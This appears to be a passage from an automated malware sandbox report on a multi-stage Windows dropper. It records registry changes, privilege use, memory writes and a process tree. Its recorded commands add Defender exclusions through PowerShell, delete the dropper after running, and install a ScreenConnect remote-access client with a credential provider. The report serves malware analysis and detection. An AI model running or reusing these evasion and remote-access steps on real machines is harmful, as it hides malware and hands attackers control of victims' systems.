\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe -
Modifies registry class 37 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\UseOriginalUrlEncoding = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC\Full msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media\1 = ";" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AdvertiseFlags = "388" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Version = "402849799" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Assignment = "1" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductName = "ScreenConnect Client (98a59bd0eed9222b)" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\PackageCode = "D32D1EE57AD9200EF07A7D4C08AB00DC" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2\D32D1EE57AD9200EF07A7D4C08AB00DC msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\ = "ScreenConnect Client (98a59bd0eed9222b) Credential Provider" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductIcon = "C:\\Windows\\Installer\\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\\DefaultIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media msiexec.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4640 1a50E5.exe 4640 1a50E5.exe 1804 skotes.exe 1804 skotes.exe 5100 2b2046.exe 5100 2b2046.exe 5068 skotes.exe 5068 skotes.exe 1876 NN9Dd7c.exe 2880 powershell.exe 2880 powershell.exe 376 powershell.exe 376 powershell.exe 2180 msedge.exe 2180 msedge.exe 2680 msedge.exe 2680 msedge.exe 5100 2b2046.exe 5100 2b2046.exe 5100 2b2046.exe 5100 2b2046.exe 4980 3302d26666d341748cb9b86600ad2546.exe 4980 3302d26666d341748cb9b86600ad2546.exe 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe 3244 identity_helper.exe 3244 identity_helper.exe 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe 4624 b61f5c2478.exe 4624 b61f5c2478.exe 3716 skotes.exe 3716 skotes.exe 6488 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe 6488 0SRXIEMGZAWB2BHOD8QO4G52BFC5.exe 6348 3K21A.exe 6348 3K21A.exe 4960 4Z894j.exe 4960 4Z894j.exe 4960 4Z894j.exe 4960 4Z894j.exe 4960 4Z894j.exe 5324 msiexec.exe 5324 msiexec.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 4080 ScreenConnect.ClientService.exe 5328 36599ddf00.exe 5328 36599ddf00.exe 2184 skotes.exe 2184 skotes.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe 5152 1a713a333e.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1876 NN9Dd7c.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 376 powershell.exe Token: SeDebugPrivilege 1720 746f41769d294a238d0d787c1fb39ef6.exe Token: SeDebugPrivilege 1956 JQY6PX392UESHKN5CCVSO6ZYV061P.exe Token: SeDebugPrivilege 4624 b61f5c2478.exe Token: SeDebugPrivilege 4960 4Z894j.exe Token: SeDebugPrivilege 5876 ga70pjP.exe Token: SeShutdownPrivilege 6128 msiexec.exe Token: SeIncreaseQuotaPrivilege 6128 msiexec.exe Token: SeSecurityPrivilege 5324 msiexec.exe Token: SeCreateTokenPrivilege 6128 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 6128 msiexec.exe Token: SeLockMemoryPrivilege 6128 msiexec.exe Token: SeIncreaseQuotaPrivilege 6128 msiexec.exe Token: SeMachineAccountPrivilege 6128 msiexec.exe Token: SeTcbPrivilege 6128 msiexec.exe Token: SeSecurityPrivilege 6128 msiexec.exe Token: SeTakeOwnershipPrivilege 6128 msiexec.exe Token: SeLoadDriverPrivilege 6128 msiexec.exe Token: SeSystemProfilePrivilege 6128 msiexec.exe Token: SeSystemtimePrivilege 6128 msiexec.exe Token: SeProfSingleProcessPrivilege 6128 msiexec.exe Token: SeIncBasePriorityPrivilege 6128 msiexec.exe Token: SeCreatePagefilePrivilege 6128 msiexec.exe Token: SeCreatePermanentPrivilege 6128 msiexec.exe Token: SeBackupPrivilege 6128 msiexec.exe Token: SeRestorePrivilege 6128 msiexec.exe Token: SeShutdownPrivilege 6128 msiexec.exe Token: SeDebugPrivilege 6128 msiexec.exe Token: SeAuditPrivilege 6128 msiexec.exe Token: SeSystemEnvironmentPrivilege 6128 msiexec.exe Token: SeChangeNotifyPrivilege 6128 msiexec.exe Token: SeRemoteShutdownPrivilege 6128 msiexec.exe Token: SeUndockPrivilege 6128 msiexec.exe Token: SeSyncAgentPrivilege 6128 msiexec.exe Token: SeEnableDelegationPrivilege 6128 msiexec.exe Token: SeManageVolumePrivilege 6128 msiexec.exe Token: SeImpersonatePrivilege 6128 msiexec.exe Token: SeCreateGlobalPrivilege 6128 msiexec.exe Token: SeCreateTokenPrivilege 6128 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 6128 msiexec.exe Token: SeLockMemoryPrivilege 6128 msiexec.exe Token: SeIncreaseQuotaPrivilege 6128 msiexec.exe Token: SeMachineAccountPrivilege 6128 msiexec.exe Token: SeTcbPrivilege 6128 msiexec.exe Token: SeSecurityPrivilege 6128 msiexec.exe Token: SeTakeOwnershipPrivilege 6128 msiexec.exe Token: SeLoadDriverPrivilege 6128 msiexec.exe Token: SeSystemProfilePrivilege 6128 msiexec.exe Token: SeSystemtimePrivilege 6128 msiexec.exe Token: SeProfSingleProcessPrivilege 6128 msiexec.exe Token: SeIncBasePriorityPrivilege 6128 msiexec.exe Token: SeCreatePagefilePrivilege 6128 msiexec.exe Token: SeCreatePermanentPrivilege 6128 msiexec.exe Token: SeBackupPrivilege 6128 msiexec.exe Token: SeRestorePrivilege 6128 msiexec.exe Token: SeShutdownPrivilege 6128 msiexec.exe Token: SeDebugPrivilege 6128 msiexec.exe Token: SeAuditPrivilege 6128 msiexec.exe Token: SeSystemEnvironmentPrivilege 6128 msiexec.exe Token: SeChangeNotifyPrivilege 6128 msiexec.exe Token: SeRemoteShutdownPrivilege 6128 msiexec.exe Token: SeUndockPrivilege 6128 msiexec.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 6128 msiexec.exe 6128 msiexec.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4712 wrote to memory of 2208 4712 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe 82 PID 4712 wrote to memory of 2208 4712 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe 82 PID 4712 wrote to memory of 2208 4712 0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe 82 PID 2208 wrote to memory of 2744 2208 u5u31.exe 83 PID 2208 wrote to memory of 2744 2208 u5u31.exe 83 PID 2208 wrote to memory of 2744 2208 u5u31.exe 83 PID 2744 wrote to memory of 4640 2744 M2G14.exe 84 PID 2744 wrote to memory of 4640 2744 M2G14.exe 84 PID 2744 wrote to memory of 4640 2744 M2G14.exe 84 PID 4640 wrote to memory of 1804 4640 1a50E5.exe 85 PID 4640 wrote to memory of 1804 4640 1a50E5.exe 85 PID 4640 wrote to memory of 1804 4640 1a50E5.exe 85 PID 2744 wrote to memory of 5100 2744 M2G14.exe 86 PID 2744 wrote to memory of 5100 2744 M2G14.exe 86 PID 2744 wrote to memory of 5100 2744 M2G14.exe 86 PID 1804 wrote to memory of 1876 1804 skotes.exe 88 PID 1804 wrote to memory of 1876 1804 skotes.exe 88 PID 1804 wrote to memory of 1876 1804 skotes.exe 88 PID 1876 wrote to memory of 2880 1876 NN9Dd7c.exe 90 PID 1876 wrote to memory of 2880 1876 NN9Dd7c.exe 90 PID 1876 wrote to memory of 2880 1876 NN9Dd7c.exe 90 PID 1876 wrote to memory of 376 1876 NN9Dd7c.exe 92 PID 1876 wrote to memory of 376 1876 NN9Dd7c.exe 92 PID 1876 wrote to memory of 376 1876 NN9Dd7c.exe 92 PID 1876 wrote to memory of 4980 1876 NN9Dd7c.exe 96 PID 1876 wrote to memory of 4980 1876 NN9Dd7c.exe 96 PID 1876 wrote to memory of 4980 1876 NN9Dd7c.exe 96 PID 1876 wrote to memory of 1720 1876 NN9Dd7c.exe 97 PID 1876 wrote to memory of 1720 1876 NN9Dd7c.exe 97 PID 1720 wrote to memory of 2680 1720 746f41769d294a238d0d787c1fb39ef6.exe 98 PID 1720 wrote to memory of 2680 1720 746f41769d294a238d0d787c1fb39ef6.exe 98 PID 2680 wrote to memory of 116 2680 msedge.exe 99 PID 2680 wrote to memory of 116 2680 msedge.exe 99 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 PID 2680 wrote to memory of 3484 2680 msedge.exe 100 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Users\Admin\AppData\Local\Temp\0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe"C:\Users\Admin\AppData\Local\Temp\0d73e8aa7ec50753c191ea8ec28ca6e726c2d0246b8c8aa7e7e91bbe275cfc2c.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u5u31.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u5u31.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\M2G14.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\M2G14.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a50E5.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a50E5.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\leafidvi"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:376
C:\leafidvi\3302d26666d341748cb9b86600ad2546.exe"C:\leafidvi\3302d26666d341748cb9b86600ad2546.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\leafidvi\3302d26666d341748cb9b86600ad2546.exe" & rd /s /q "C:\ProgramData\90H4ECB16P8Y" & exit8⤵
- System Location Discovery: System Language Discovery
PID:4112 -
C:\Windows\SysWOW64\timeout.exetimeout /t 109⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:728
C:\leafidvi\746f41769d294a238d0d787c1fb39ef6.exe"C:\leafidvi\746f41769d294a238d0d787c1fb39ef6.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi8⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x130,0x170,0x7ffb492546f8,0x7ffb49254708,0x7ffb492547189⤵PID:116
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,4171602498077391023,8496927748705102063,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:29⤵PID:3484
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,4171602498077391023,8496927748705102063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:39⤵
- Suspicious behavior: EnumeratesProcesses
PID:2180
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,4171602498077391023,8496927748705102063,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:89⤵PID:4044
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,4171602498077391023,8496927748705102063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:19⤵PID:4196
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,4171602498077391023,8496927748705102063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:19⤵PID:2476
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,4171602498077391023,8496927748705102063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:89⤵PID:1504
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,4171602498077391023,8496927748705102063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:89⤵
- Suspicious behavior: EnumeratesProcesses
PID:3244
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,4171602498077391023,8496927748705102063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:19⤵PID:1268
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,4171602498077391023,8496927748705102063,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:19⤵PID:2220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,4171602498077391023,8496927748705102063,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:19⤵PID:4488
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,4171602498077391023,8496927748705102063,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:19⤵PID:2236
C:\Users\Admin\AppData\Local\Temp\1017675001\b61f5c2478.exe"C:\Users\Admin\AppData\Local\Temp\1017675001\b61f5c2478.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:216 -
C:\Users\Admin\AppData\Local\Temp\1017675001\b61f5c2478.exe"C:\Users\Admin\AppData\Local\Temp\1017675001\b61f5c2478.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4624
C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5876 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"7⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
